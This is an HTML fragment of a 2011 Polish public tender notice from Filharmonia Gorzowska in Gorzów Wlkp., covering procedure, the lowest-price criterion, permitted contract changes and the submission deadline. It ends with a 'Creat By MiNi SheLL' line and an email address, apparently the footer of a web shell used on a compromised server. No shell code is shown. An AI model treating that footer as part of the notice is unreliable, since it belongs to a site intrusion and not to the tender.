<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa :
1.w przypadku zmian obowiązującej stawki podatku VAT, 
2.odnośnie terminu wykonania przedmiotu umowy:
a.	 w sytuacji wystąpienia awarii niezawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany; 
b.	opóźnienia w robotach budowlanych przez Generalnego Wykonawcę Filharmonii Gorzowskiej, co uniemożliwi rozpoczęcie dostawy w terminie określonym w niniejszej umowie;
c.	 działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia; 
d.	gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cea.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Edukacji Artystycznej - Filharmonia Gorzowska, 
ul. Wał Okrężny 36/37
 66-400 Gorzów Wlkp.
(Tymczasowa siedziba Zamawiającego).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 11:00, miejsce: Centrum Edukacji Artystycznej - Filharmonia Gorzowska, 
ul. Wał Okrężny 36/37
 66-400 Gorzów Wlkp.
(Tymczasowa siedziba Zamawiającego) pokój 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com